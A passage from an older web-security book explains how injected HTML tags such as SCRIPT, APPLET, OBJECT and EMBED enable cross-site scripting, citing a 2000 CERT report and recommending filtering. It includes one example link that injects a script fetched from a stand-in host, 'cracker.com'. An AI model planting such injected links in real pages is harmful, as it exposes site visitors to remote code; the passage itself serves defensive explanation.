11.13 Evil HTML Tags and ScriptIn early 2000, the CERT Coordination Center reported that evil HTML tags or script could cause intrusion into the Web browser's computer or even attack other servers. The tags that may be used to do this include <SCRIPT>, <APPLET>, <OBJECT>, and <EMBED>. Servers should not accept HTML containing these tags from untrusted sources. It would be a very good idea to disable these features in your browser, if possible, for higher security. Of course, this would end all those cool Java hacks. Other tags, such as the <FORM> tag, can also be abused. A typical exploit would be the following. <A HREF="http://pentacorp.com/comment.cgi?mycomment=<SCRIPT src='/books/3/349/1/html/2/http://cracker.com/exploit'></SCRIPT>"> Click for image</A> Starting with version 4.x Netscape tries to limit these exploits by requiring the URL inside the script to be on the same system as the page in which it appears. Most major sites filter these tags out of any pages that are assembled from data originating outside their site and therefore untrusted.
|
Top |